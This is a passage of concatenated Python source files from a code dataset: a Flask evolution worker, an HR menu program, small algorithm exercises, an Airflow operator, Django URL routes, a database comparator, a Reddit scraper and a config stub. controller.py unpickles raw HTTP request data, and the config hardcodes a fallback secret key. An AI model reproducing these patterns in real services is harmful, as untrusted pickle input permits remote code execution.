'\n 'It can optionally be specified by setting the `ZEN_ENV` environment '\n 'variable or passing the environment flag.'\n )\n\n app = create_app(zenysis_environment=environment)\n app.run(host='0.0.0.0', port=Flags.ARGS.port)\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","sub_path":"web/runserver.py","file_name":"runserver.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"23923871","text":"from datetime import date\n\nclass Employee:\n\n def __init__ (self, employee_name , employee_age, employee_salary, employment_year):\n self.name = employee_name\n self.age = employee_age\n self.salary = employee_salary\n self.employment_year = employment_year\n\n def get_working_years(self):\n current_year = date.today().year\n return current_year - self.employment_year\n\n def __str__(self):\n return 'Employee (name= '+ self.name +', age= '+ str(self.age) +', salary= '+ str(self.salary) +', employment year: '+ str(self.employment_year) + ')'\n\nclass Manager(Employee):\n\n def __init__(self, employee_name , employee_age, employee_salary, employment_year, bonus):\n super().__init__(employee_name , employee_age, employee_salary, employment_year)\n self.bonus_percentage = bonus\n\n def get_working_years(self):\n current_year = date.today().year\n return current_year - self.employment_year\n\n def get_bonus(self):\n return self.bonus_percentage * self.salary\n\n def __str__(self):\n return 'Manager (name= '+ self.name +', age= '+ str(self.age) +', salary= '+ str(self.salary) +', employment year: '+ str(self.employment_year) + ', bonus: '+str(self.bonus_percentage) + ')'\n\n\ndef main():\n employees = []\n managers = []\n\n print (\"Options:\")\n print (\" 1. Show Employees\")\n print (\" 2. Show Managers\")\n print (\" 3. Add An Employee\")\n print (\" 4. Add A Manager\")\n print (\" 5. Exit\")\n\n x = int(input (\"Please choose an option from 1-5: \"))\n\n\n while x != 5 :\n if x == 1:\n print(\"***************************\")\n print(\"Employees: \")\n for item in employees:\n print(item)\n elif x == 2:\n print(\"***************************\")\n print(\"Managers: \")\n for item in managers:\n print(item)\n elif x == 3:\n print(\"***************************\")\n print (\"Enter employee info: \")\n name = input(\"name: \")\n age = input(\"age: \")\n salary = float(input(\"salary: \"))\n year = int(input(\"employment date: \"))\n newemp = Employee(name,age,salary,year)\n employees.append(newemp)\n elif x == 4:\n print(\"***************************\")\n print(\"Enter manager info: \")\n name = input(\"name: \")\n age = input(\"age: \")\n salary = float(input(\"salary: \"))\n year = int(input(\"employment date: \"))\n bonus = float(input(\"bonus salary: \"))\n newman = Manager(name,age,salary,year,bonus)\n managers.append(newman)\n print (\"Options:\")\n print (\" 1. Show Employees\")\n print (\" 2. Show Managers\")\n print (\" 3. Add An Employee\")\n print (\" 4. Add A Manager\")\n print (\" 5. 
Exit\")\n\n x = int(input (\"Please choose an option from 1-5: \"))\n\n\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"hr_pro.py","file_name":"hr_pro.py","file_ext":"py","file_size_in_byte":3022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"106522573","text":"def isValid(s):\n stack = []\n right_to_left = {')':'(',']':'[','}':'{'}\n for c in s:\n if stack and c in right_to_left.keys() and stack.pop() != right_to_left[c]: # c is right parenthese\n return False\n elif c in right_to_left.values(): # c is left parenthese\n stack.append(c)\n else: # c is not one of them\n return False\n return stack == []\n\n\nassert isValid('()[]') == True\nassert isValid('[()]') == True\nassert isValid('[(])') == False\n","sub_path":"20_Valid Parentheses/map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"64162130","text":"import data.model as model_source\nimport os\nimport pandas as pd\nimport pickle\nimport requests\nimport time\n\nfrom core.algorithm_flow import Evolution\nfrom core.models import Model, PopulationImpl, EvolutionParams, EvolutionTask, PopulationHyperParams\nfrom core.validators import HyperParametersDFValidator, ModelValidator, \\\n ImplementationDictValidator, EvolutionDictValidator\nfrom core.implementation import Crossover, Fitness, Mutation, PopulationCopy, \\\n PopulationInit, PopulationMerge, Selection, population_to_pickle\nfrom concurrent.futures import ThreadPoolExecutor\nfrom flask import Flask, request, jsonify\n\napp = Flask(__name__)\n\nSERVER_PORT = 5002\nSERVER_URL = '127.0.0.1:' + str(SERVER_PORT)\nMODEL_URL_PREFIX = 'http://127.0.0.1:5001/model/'\nERROR_URL = 'http://127.0.0.1:5001/model/'\nANALYZER_URL = 'http://localhost:5000/data/'\nTASK_FINISHED_URL = 'http://127.0.0.1:5001/task_finished/'\n\n\nIMPLEMENTATION_OBJ_DICT = {'crossover': 'pmx', 'mutation': 'one_point', 'init': 'init_population',\n 'fitness': 'fitness', 'population_copy': 'copy', 'population_merge': 'merge',\n 'selection': 'select'}\n\n\ndef register_worker():\n def try_connection():\n try:\n requests.get('http://127.0.0.1:5001/')\n return True\n except requests.ConnectionError:\n return False\n\n while not try_connection():\n time.sleep(5)\n\n requests.post('http://127.0.0.1:5001/worker_ready/' + str(os.getpid()) + '/' + SERVER_URL)\n\n\ndef download_model_file(model_name: str):\n model_file = requests.get(MODEL_URL_PREFIX + model_name)\n with open(os.path.join(os.getcwd(), 'model.txt'), 'w') as dest_file:\n dest_file.write(model_file.text)\n\n\ndef send_data(population, url: str):\n pickled_soluton = population_to_pickle(population)\n try:\n requests.post(url, pickled_soluton)\n except requests.ConnectionError:\n pass\n\n\nclass EvolutionManager:\n\n def __init__(self):\n self._evolution_tasks = []\n self._evolution_objects = []\n\n def add_evolution_task(self, evolution_task: EvolutionTask):\n self._evolution_tasks.append(evolution_task)\n\n def initialize_waiting_tasks(self):\n new_evolution_objects = [Evolution.from_task(task) for task in self._evolution_tasks]\n self._evolution_objects.extend(new_evolution_objects)\n for ev_object in self._evolution_objects:\n ev_object.init_evolution()\n self._evolution_tasks = []\n\n def start_evolution(self):\n thread_pool = ThreadPoolExecutor(max_workers=2)\n for evolution_object in self._evolution_objects:\n for _ in range(evolution_object.batch_amount):\n current_population = 
evolution_object.evolve()\n thread_pool.submit(send_data, current_population, ANALYZER_URL + evolution_object.population_name)\n\n\n@app.route('/', methods=['POST'])\ndef init_evolution():\n params = pickle.loads(request.data)\n download_model_file(params['model_file'])\n\n hyperparams_df = create_hyperparams_df(params)\n\n try:\n hyperparams = create_hyperparams(hyperparams_df)\n model = create_model()\n implementation_obj = create_implementation_object()\n evolution_params = create_evolution_params_object({'batch_size': 10, 'generations': params['size']})\n except Exception as e:\n requests.post(ERROR_URL + params['name'], data=pickle.dumps([params['worker_id'], params['model_file']]))\n # return jsonify({})\n raise e\n\n evolution_manager.add_evolution_task(EvolutionTask(population_name=params['name'],\n evolution_params=evolution_params,\n model=model,\n population_impl=implementation_obj,\n population_hyperparams=hyperparams))\n evolution_manager.initialize_waiting_tasks()\n evolution_manager.start_evolution()\n\n requests.post(TASK_FINISHED_URL + params['worker_id'] + '/' + params['name'])\n\n return jsonify({})\n\n\ndef create_hyperparams_df(params):\n hyperparams_dict = dict(crossover_coef=[params['crossover']], mutation_coef=[params['mutation']], pop_size=[params['size']])\n hyperparams_df = pd.DataFrame.from_dict(hyperparams_dict)\n return hyperparams_df\n\n\ndef create_hyperparams(hyperparams_df):\n HyperParametersDFValidator.validate(hyperparams_df)\n hyperparams_df.pop_size.astype(int)\n return PopulationHyperParams.from_from_dataframe(hyperparams_df)\n\n\ndef create_model():\n model_dict = model_source.get_model(os.path.join(os.getcwd(), os.path.join(os.getcwd(), 'model.txt')))\n model = Model.from_dict(model_dict)\n ModelValidator.validate(model)\n return model\n\n\ndef create_implementation_object():\n ImplementationDictValidator.validate(IMPLEMENTATION_OBJ_DICT)\n implementation_classes = {'crossover': Crossover,\n 'mutation': Mutation,\n 'init': PopulationInit,\n 'fitness': Fitness,\n 'population_copy': PopulationCopy,\n 'population_merge': PopulationMerge,\n 'selection': Selection}\n implementation_dict = dict()\n for func, name in IMPLEMENTATION_OBJ_DICT.items():\n _cls = implementation_classes[func]\n implementation_dict[func] = (_cls, _cls.__dict__[name])\n return PopulationImpl.from_dict(implementation_dict)\n\n\ndef create_evolution_params_object(evolution_params: dict):\n EvolutionDictValidator.validate(evolution_params)\n return EvolutionParams.from_dict(evolution_params)\n\n\nif __name__ == '__main__':\n evolution_manager = EvolutionManager()\n register_worker()\n app.run(port=SERVER_PORT)\n","sub_path":"controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":5883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"81660808","text":"import re\n\ndef verify(isbn):\n formattedString = re.sub('[^xX0-9]+', '', isbn)\n\n if (len(formattedString) != 10):\n return False\n\n multiplicand = 10\n sumDigits = 0\n\n for char in formattedString:\n if (multiplicand != 1 and (char == 'x' or char == 'X')):\n return False\n elif (multiplicand == 1 and (char == 'x' or char == 'X')):\n sumDigits += 10\n else:\n sumDigits += multiplicand * int(char)\n \n multiplicand -= 1\n \n return sumDigits % 11 == 
0\n","sub_path":"isbn-verifier/isbn_verifier.py","file_name":"isbn_verifier.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"474965061","text":"# -*- coding: utf-8 -*-\n\nfrom airflow.utils.decorators import apply_defaults\nfrom rekcurd_airflow.operators.rekcurd_operator import RekcurdOperator\nfrom airflow.exceptions import AirflowException\nfrom airflow.hooks.http_hook import HttpHook\nimport json\nfrom requests import Request\nfrom urllib.parse import urljoin\n\n\nclass EvaluationUploadOperator(RekcurdOperator):\n \"\"\"\n Upload evaluation data\n\n :param app_id: The targetted Rekcurd application ID.\n :type app_id: integer\n :param evaluation_file_path: file path to evaluation data to be uploaded\n :type evaluation_file_path: string\n \"\"\"\n @apply_defaults\n def __init__(self,\n app_id,\n timeout=300,\n evaluation_file_path=None,\n *args, **kwargs):\n super().__init__(\n endpoint='/api/applications/{}/evaluations'.format(app_id),\n timeout=timeout,\n method='POST',\n *args,\n **kwargs)\n\n self.__evaluation_path = evaluation_file_path\n\n def execute(self, context):\n http = HttpHook(self.method, http_conn_id=self.http_conn_id)\n session = http.get_conn(self.headers)\n with open(self.__evaluation_path, 'rb') as evaluation_file:\n evaluation_data = evaluation_file.read()\n\n req = Request(self.method,\n urljoin(http.base_url, self.endpoint),\n files={'file': evaluation_data},\n headers=self.headers)\n\n response = http.run_and_check(session,\n session.prepare_request(req),\n self.extra_options)\n result = json.loads(response.text)\n\n if result['status']:\n self.log.info(f'Success. evaluation_id: {result[\"evaluation_id\"]}')\n else:\n raise AirflowException(result['message'])\n\n return result[\"evaluation_id\"]\n","sub_path":"rekcurd_airflow/operators/evaluation_upload_operator.py","file_name":"evaluation_upload_operator.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"350707749","text":"from django.conf.urls import patterns, url\nfrom regsoft.views import *\n\nurlpatterns = [\n\turl(r'^firewallzouter/scan/$', firewallzo_dashboard),\n\turl(r'^firewallzouter/scan/(?P\\d+)$', firewallzo_dashboard_two),\n\turl(r'^firewallzouter/confirm/$', firewallzo_confirm),\n\turl(r'^firewallzouter/confirm/(?P\\d+)$', firewallzo_setgleader),\n\turl(r'^firewallzouter/groupcodes/$', gcodelist),\n\turl(r'^firewallzouter/testx/$', testx),\n\turl(r'^firewallzouter/unconfirm/(?P\\d+)$', firewallzo_unconfirm),\n\turl(r'^firewallzouter/unconfirmed/(?P\\d+)$', firewallzo_unconfirm),\n\turl(r'^firewallzouter/edit/(?P\\d+)$', firewallzo_edit_part),\n\turl(r'^firewallzouter/add/(?P\\d+)$', firewallzo_add),\n\turl(r'^firewallzouter/add_guest/$', firewallzo_add_guest),\n\turl(r'^firewallzouter/barcodelist/$', get_barcode),\n\n\turl(r'^common/search/$', common_search, name=\"common_search\"),\n\n\turl(r'^controlz/home/$', controlz_home),\n\turl(r'^controlz/stats/$', controlz_stats, name=\"controlz_stats\"),\n\turl(r'^controlz/home/(?P\\d+)$', controlz_dashboard),\n\turl(r'^controlz/edit/(?P\\d+)$', controlz_edit_part),\n\turl(r'^controlz/bill_select/$', controlz_bill_select),\n\turl(r'^controlz/bill_delete/$', controlz_delete_bill),\n\turl(r'^controlz/bill_view/(?P\\d+)/$', controlz_view_bill),\n\turl(r'^controlz/bill_details/(?P\\d+)$', controlz_bill_details),\n\turl(r'^controlz/recnacc_bill_list/$', 
recnacc_bill_list),\n\turl(r'^controlz/recnacc_bill_print/(?P\\d+)$', recnacc_bill_print),\n\t# url(r'^controlz/billdetails/(?P\\d+)$', ),\n\n\turl(r'^controlz/bill_print/$', controlz_bill_print),\n\turl(r'^group_notify/$', recnacc_notify),\n\n\n\n\turl(r'^recnacc/home/$', recnacc_home),\n\turl(r'^recnacc/home/(?P\\d+)$', recnacc_dashboard),\n\turl(r'^recnacc/allot/(?P\\d+)$', recnacc_allot),\n\turl(r'^recnacc/faculty_allot/(?P\\d+)$', recnacc_faculty_allot),\n\turl(r'^recnacc/deallocate/(?P\\d+)$', recnacc_deallocate),\n\turl(r'^recnacc/checkout/(?P\\d+)$', recnacc_checkout),\n\t#url(r'^recnacc/return_inventory/(?P\\d+)$', recnacc_return_inventory),\n\turl(r'^recnacc/checkedout_select_gl/$', recnacc_checkedout_select_gl),\n\turl(r'^recnacc/checked_out_participants/(?P\\d+)$', recnacc_checked_out_participants),\n\turl(r'^recnacc/checked_out_list/(?P\\d+)$', recnacc_checked_out_participants_in),\n\turl(r'^recnacc/bhavan_inventory_list/$', recnacc_bhavan_inventory_list),\n\turl(r'^recnacc/room_availibility_list/$', recnacc_room_availibility_list),\n\turl(r'^recnacc/bhavan_gleader_list/$', recnacc_bhavan_gleader_list),\n\turl(r'^recnacc/room_list/$', recnacc_room_list),\n\turl(r'^recnacc/room_details/(?P\\d+)$', recnacc_room_details),\n\t\n\n\turl(r'^teams/$', mainScreen, name='main'),\n\turl(r'^teams/uploadlist/$', upload_list, name='upload_list'),\n\turl(r'^teams/chooseLeader/$', choose_leader, name='choose_leader'),\n\turl(r'^teams/genTeam/$', genTeam, name='genTeam'),\n\turl(r'^teams/addbitsian/$', bitsian_add, name='add_bitsian'),\n\n\turl(r'^teams/participantdetails/(?P\\d+)/$', participant_details, name=\"participant_details\"),\n\turl(r'^teams/participantdetails/$', participant_details_home, name=\"participant_home\"),\n\turl(r'^teams/eventdetails/(?P\\d+)/$', event_details, name=\"event_details\"),\n\turl(r'^teams/eventdetails/$', event_details_home, name=\"event_home\"),\n\turl(r'^teams/teamdetails/(?P\\d+)/$', team_details, name=\"team_details\"),\n\turl(r'^teams/teamdetails/$', team_details_home, name=\"team_home\"),\n\n\turl(r'^teams/getparticipantlist/$', getParticipantList, name='getParticipantList'),\n\n\turl(r'^teams/selectEvent_delete/$', selectEvent_manageTeams, name='selectEvent_manageTeams'),\n\turl(r'^teams/selectTeam_delete/$', showTeams_manageTeams, name='showTeams_manageTeams'),\n\turl(r'^teams/deleteTeams/$', deleteTeam_manageTeams, name='deleteTeam_manageTeams'),\n\n\turl(r'^teams/show_teamList/$', eventlist_showTeams, name='eventlist_showTeams'),\n\turl(r'^teams/show_selectEvent/$', eventList_selectEvent, name='eventList_selectEvent'),\n\turl(r'^teams/singleTeam/(?P\\d+)/$', eventList_selectEvent, name='eventList_selectEvent'),\n \n \turl(r'^teams/finalist_selectEvent/$', finalist_selectEvent, name=\"finalist_selectEvent\"), \n \turl(r'^teams/finalist_showTeams/$', finalist_showTeams, name=\"finalist_showTeams\"), \n \turl(r'^teams/setFinalist/$', setFinalist, name=\"setFinalist\"), \n\n \turl(r'^teams/winner_selectEvent/$', winner_selectEvent, name=\"winner_selectEvent\"), \n \turl(r'^teams/winner_showTeams/$', winner_showTeams, name=\"winner_showTeams\"), \n \turl(r'^teams/setWinner/$', setWinner, name=\"setWinner\"), \n\n\n\n\n \turl(r'^genteam_txt/$', certi_gen_txt), \n\n\t# url(r'^firewallzouter/scan/$', firewallzo_dashboard),\n\t# url(r'^firewallzouter/scan/$', firewallzo_dashboard),\n\n\n\t# url(r'^firewallzouter/edit/', firewallzo_home),\n\t# url(r'^firewallzouter/(?P\\w+)/', firewallzo_home),\n\t\n \n\t# url(r'^getbarcode/$', get_barcode, name='get 
barcode'),\n\t# url(r'^firewallz/$', firewallzo_gl, name='firewallz outer booth home'),\n\t# url(r'^firewallz/edit/(?P\\d+)/$',firewallzo_edit_participant,name='editing individual participants'),\n\t# url(r'^firewallz/add/(?P\\d+)/$',firewallzo_add_participant,name='add participant'),\n\t# url(r'^firewallz/newgl/(?P\\d+)/$',firewallzo_gl_reassign,name='firewallzo_gl_reassign'),\n\t# url(r'^firewallz/remove/(?P\\d+)/$',firewallzo_remove_people,name='remove participant'),\n\t# url(r'^firewallzi/$',firewallz_fid,name='Firewallz Inner Booth'),\n\t# url(r'^recnacc/$', reconec_home, name='recnacc home'),\n\t# url(r'^recnacc/dashboard/(?P\\d+)/$',recnacc_dashboard, name='recnacc_dashboard'),\n\t# url(r'^recnacc/allot/(?P\\d+)/$',acco_list,name='provides accomodation'),\n\t# url(r'^recnacc/deallocate/(?P\\d+)/$',reconec_deallocate,name='provides accomodation'),\n\t# url(r'^recnacc/phonedetails/(?P\\d+)/$',phonedetails,name='phone numbers'),\n\t# url(r'^recnacc/checkout/(?P\\d+)/$',reconec_checkout,name='checkout people'),\n\t# url(r'^recnacc/all_bhavans/$', all_bhawans, name='all bhavans'),\n\t# url(r'^recnacc/roomdetails/$', room_details, name='all bhavans'),\n\t# url(r'^recnacc/bhavanwise/$',college_in_bhavan,name='bhavan college mapping'),\n\t# url(r'^controlz/receipt/$', receipt, name='controlzhome'),\n\t# url(r'^controlz/lists/$', controlz_lists, name='controlzlists'),\n\t# url(r'^controlz/add_denominations/(?P\\d+)/$', enter_denominations, name='denominationsform'),\n\t# url(r'^controlz/eventdetails/$', controlz_event_details, name='event participants details'),\n\t# url(r'^controlz/make_sl/(?P\\d+)/$',controlz_sport_leader,name='making sport leader'),\n\t# url(r'^controlz/edit/(?P\\d+)/$',controlz_edit_participant,name='editing individual participants for controlz'),\n\t# url(r'^controlz/revert_bill/(?P\\d+)/$',controlz_cancel_bill,name='cancel bill'),\n\t# url(r'^showbills/$', show_prev_bills, name='show bills'),\n\t# url(r'^bill_detail/(?P\\d+)/$', bill_details, name='view bill Details'),\n\t# url(r'^controlz/bill/(?P\\d+)/$',generate_receipt,name='print bill'),\n\t# url(r'^controlz/bill_print/(?P\\d+)/$',print_receipt,name='print bill'),\n]\n","sub_path":"regsoft/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":7203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"513069672","text":"import datetime\nfrom py_scripts.dbComparator import process_uniqs, queryConstructor, process_dates\nfrom py_scripts.helpers import dbHelper, converters\n\n\ndef compare_table(prod_connection, test_connection, table, is_report, service_dir, mapping, start_time,\n comparing_info, **kwargs):\n logger = kwargs.get('logger')\n comparing_step = kwargs.get('comparing_step')\n depth_report_check = kwargs.get('depth_report_check')\n mode = kwargs.get('mode')\n local_break, max_amount = check_amount(prod_connection, test_connection, table, logger)\n if not local_break:\n if is_report:\n dates = converters.convertToList(process_dates.compare_dates(prod_connection, test_connection, table,\n depth_report_check, comparing_info, logger))\n dates.sort()\n query_list = queryConstructor.InitializeQuery(prod_connection, mapping, table,\n comparing_step, logger).report(dates, mode, max_amount)\n else:\n query_list = queryConstructor.InitializeQuery(prod_connection, mapping, table,\n comparing_step, logger).entity(max_amount)\n global_break, local_break = iterate_by_query_list(prod_connection, test_connection, query_list, table,\n start_time, 
comparing_info, service_dir, **kwargs)\n return global_break\n else:\n logger.warn('Local_break flag detected. Checking of table {} skipped.'.format(table))\n return False\n\n\ndef check_amount(prod_connection, test_connection, table, logger):\n prod_record_amount, test_record_amount = dbHelper.get_amount_records(table,\n None,\n [prod_connection, test_connection],\n logger)\n if prod_record_amount == 0 and test_record_amount == 0:\n logger.warn(\"Table {} is empty on both servers!\".format(table))\n return True, 0\n if prod_record_amount == 0:\n logger.warn(\"Table {} is empty on prod-server!\".format(table))\n return True, 0\n if test_record_amount == 0:\n logger.warn(\"Table {} is empty on test-server!\".format(table))\n return True, 0\n if prod_record_amount != test_record_amount:\n sub_result, side, percents = subtract(prod_record_amount, test_record_amount)\n if side == 'Prod':\n base = prod_connection.db\n else:\n base = test_connection.db\n logger.warn(('Amount of records differs for table {}. '.format(table) +\n 'Prod record amount: {}. '.format(prod_record_amount) +\n 'Test record amount: {}. '.format(test_record_amount) +\n 'Db {0} has more records. Difference equals {1}, {2:.5f} percent'.format(base, sub_result, percents)))\n max_amount = max(prod_record_amount, test_record_amount)\n return False, max_amount\n\n\ndef subtract(prod_amount, test_amount):\n # Returns the absolute difference, which side has more rows and the difference in percent.\n if prod_amount > test_amount:\n difference = prod_amount - test_amount\n side = 'Prod'\n percents = difference / prod_amount * 100\n else:\n difference = test_amount - prod_amount\n side = 'Test'\n percents = difference / test_amount * 100\n return difference, side, percents\n\n\ndef iterate_by_query_list(prod_connection, test_connection, query_list, table, start_time, comparing_info,\n service_dir, **kwargs):\n table_start_time = datetime.datetime.now()\n logger = kwargs.get('logger')\n strings_amount = kwargs.get('strings_amount')\n fail_with_first_error = kwargs.get('fail_with_first_error')\n table_timeout = kwargs.get('table_timeout')\n prod_uniq = set()\n test_uniq = set()\n for query in query_list:\n local_break, prod_tmp_uniq, test_tmp_uniq = get_differences(prod_connection, test_connection, table, query,\n comparing_info, strings_amount, service_dir, logger)\n prod_uniq = process_uniqs.merge_uniqs(prod_uniq, prod_tmp_uniq)\n test_uniq = process_uniqs.merge_uniqs(test_uniq, test_tmp_uniq)\n\n if prod_uniq and test_uniq:\n prod_uniq = process_uniqs.thin_uniq_list(prod_uniq, test_uniq, logger)\n test_uniq = process_uniqs.thin_uniq_list(test_uniq, prod_uniq, logger)\n\n if table_timeout is not None:\n duration = datetime.datetime.now() - table_start_time\n if duration > datetime.timedelta(minutes=table_timeout):\n logger.error(('Checking table {} '.format(table) +\n 'exceeded timeout {}. Finished'.format(table_timeout)))\n return False, True\n\n if not local_break and fail_with_first_error:\n logger.info((\"First error found, checking failed. 
\" +\n \"Comparing takes {}\").format(datetime.datetime.now() - start_time))\n return True, False\n\n if process_uniqs.check_uniqs(prod_uniq, test_uniq, strings_amount, table, query, service_dir, logger):\n return False, True\n # Hack, intended for writing all uniqs to file\n process_uniqs.check_uniqs(prod_uniq, test_uniq, 0, table, query_list[0], service_dir, logger)\n return False, False\n\n\ndef get_differences(prod_connection, test_connection, table, query, comparing_info,\n strings_amount, service_dir, logger):\n prod_entities, test_entities = dbHelper.DbConnector.parallel_select([prod_connection, test_connection], query)\n if (prod_entities is None) or (test_entities is None):\n logger.warn('Table {} skipped because something going bad'.format(table))\n return False, set(), set()\n prod_uniq = set(prod_entities) - set(test_entities)\n test_uniq = set(test_entities) - set(prod_entities)\n if not any([len(prod_uniq) == 0, len(test_uniq) == 0]):\n logger.error(\"Tables {} differs!\".format(table))\n comparing_info.update_diff_data(table)\n if process_uniqs.check_uniqs(prod_uniq, test_uniq, strings_amount, table, query, service_dir, logger):\n return False, set(), set()\n else:\n return False, prod_uniq, test_uniq\n else:\n return True, set(), set()\n","sub_path":"py_scripts/dbComparator/unified_comparing_class.py","file_name":"unified_comparing_class.py","file_ext":"py","file_size_in_byte":6488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"57073000","text":"from pymessenger.bot import Bot\r\nimport json\r\nfrom flask import url_for\r\n\r\n'''\r\nA module to collect a bunch of useful, generic messages to send to users.\r\n'''\r\n\r\ndef send_login_button(page_token, receipient_id, login_link):\r\n bot = Bot(page_token)\r\n bot.send_message(receipient_id, json.dumps({\r\n \"attachment\": {\r\n \"type\": \"template\",\r\n \"payload\": {\r\n \"template_type\": \"generic\",\r\n \"elements\": [{\r\n 'title': 'Login to Drive',\r\n 'image_url': 'https://www.google.com/drive/static/images/drive/logo-drive.png'\r\n ,\r\n \"buttons\": [{\r\n \"type\": \"account_link\",\r\n \"url\": url_for(login_link, _external=True)\r\n }]\r\n }]\r\n }\r\n }\r\n }))\r\n","sub_path":"AppMessaging.py","file_name":"AppMessaging.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"177601681","text":"# 画像を一枚指定するとそれが何なのか判定する\nimport ic_module as ic\nimport os.path as op\n\nwhile True :\n while True :\n imgname = input(\"\\n>> 入力したい画像ファイル(「END」で終了):\")\n if op.isfile(imgname) or imgname == \"END\":\n break\n print(\">> そのファイルは存在しません\")\n if imgname == \"END\":\n break\n\n # 関数実行\n ic.TestProcess(imgname)","sub_path":"ML/testprocess.py","file_name":"testprocess.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"229091541","text":"from django.shortcuts import get_object_or_404\nfrom rest_framework import serializers\n\ndef get_model_from_dict_or_uuid(serializer, model, data):\n if isinstance(data, dict):\n if \"uuid\" in data:\n model_to_edit = get_object_or_404(model, uuid=data.get('uuid'))\n serialized_data = serializer(model_to_edit, data=data)\n else:\n serialized_data = serializer(data=data)\n if serialized_data.is_valid(raise_exception=True):\n return serialized_data.save()\n else:\n raise serializers.ValidationError(serializer.errors)\n else:\n return 
get_object_or_404(model, uuid=data)","sub_path":"API/utils/get_model_from_dict_or_uuid.py","file_name":"get_model_from_dict_or_uuid.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"624662890","text":"'''PROGRAM TO PRINT THE FOLLOWING PATTERN\n* \n* * \n* * * \n* * * * \n* * * \n* * \n* \n'''\n\n#--- main ---\nn=int(input(\"ENTER THE MAXIMUM NUMBER OF STARS YOU WANT :: \")); #INPUT\nfor i in range(n): #INCREASING STARS\n for j in range(i): \n print ('* ', end=\"\") \n print('') \n \nfor i in range(n,0,-1): #DECREASING STARS\n for j in range(i): \n print('* ', end=\"\") \n print('')\n\nQUIT=input(\"\\nPRESS ENTER TO EXIT\")\n","sub_path":"Pattern_2.py","file_name":"Pattern_2.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"340737993","text":"import praw\nimport sub\nimport json\n\nclass Scraper:\n\n\tdef __init__(self, sub, reddit):\n\t\tself.sub = sub\n\t\tself.reddit = reddit\n\t\tself.loadExistingUsers()\n\t\tself.users_found = []\n\n\tdef loadExistingUsers(self):\n\t\twith open(self.sub.existing_users) as json_file:\n\t\t\tdata = json.load(json_file)\n\n\t\t\tself.existing_users = data[\"existing\"]\n\n\n\tdef run(self):\n\n\t\tforceLimit = self.sub.scraper_post_limit\n\t\ttype = self.sub.post_type\n\n\t\tcount = 1\n\n\t\t#for post in self.reddit.subreddit(self.sub.subName).new(limit=forceLimit):\n\n\t\tposts = []\n\n\t\tif type == \"new\":\n\t\t\tposts = self.reddit.subreddit(self.sub.subName).new(limit=forceLimit)\n\t\telif type == \"hot\":\n\t\t\tposts = self.reddit.subreddit(self.sub.subName).hot(limit=forceLimit)\n\t\telif type == \"controversial\":\n\t\t\tposts = self.reddit.subreddit(self.sub.subName).controversial(limit=forceLimit)\n\n\t\tfor post in posts:\n\t\t\t#print(post.title)\n\t\t\tcomments = post.comments.list()\n\t\t\tfor comment in comments:\n\t\t\t\ttry:\n\t\t\t\t\tauthor = str(comment.author)\n\n\t\t\t\t\t#Limit number of scrapes\n\t\t\t\t\tif(count > forceLimit):\n\t\t\t\t\t\treturn\n\n\t\t\t\t\tif(self.addUser(author)):\n\t\t\t\t\t\tself.sub.logMe(\"Scraping user: \" + str(comment.author) + \" #\" + str(count))\n\t\t\t\t\t\tcount = count + 1\n\n\t\t\t\texcept AttributeError:\n\t\t\t\t\tprint(\"Unknown error!\")\n\n\tdef addUser(self, username):\n\t\tif username in self.existing_users:\n\t\t\tself.sub.logMe(\"Duplicate found (\" + username + \")\")\n\t\telse:\n\t\t\tself.users_found.append(username)\n\n\t\t\t#Add individual users one-by-one to the scraper file (append, not overwrite)\n\t\t\twith open(self.sub.scraper_users, 'a') as f:\n\t\t\t\tf.write(\"%s\\n\" % username)\n\n\t\t\treturn True\n\t\treturn False\n","sub_path":"runscrape.py","file_name":"runscrape.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"533361274","text":"import os\nimport sys\n\nbasedir = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))\n\n# SQLite URI compatible\nWIN = sys.platform.startswith('win')\nif WIN:\n prefix = 'sqlite:///'\nelse:\n prefix = 'sqlite:////'\n\n\nclass BaseConfig:\n SECRET_KEY = os.getenv('SECRET_KEY', 'esterTion')\n\n ADMIN_EMAIL = os.getenv('ADMIN_EMAIL', '150402207@sut.edu.cn')\n\n\nclass DevelopmentConfig(BaseConfig):\n DEBUG = True\n\n SQLALCHEMY_DATABASE_URI = prefix + os.path.join(basedir, 'data-dev.db')\n\n\nclass TestingConfig(BaseConfig):\n TESTING = 
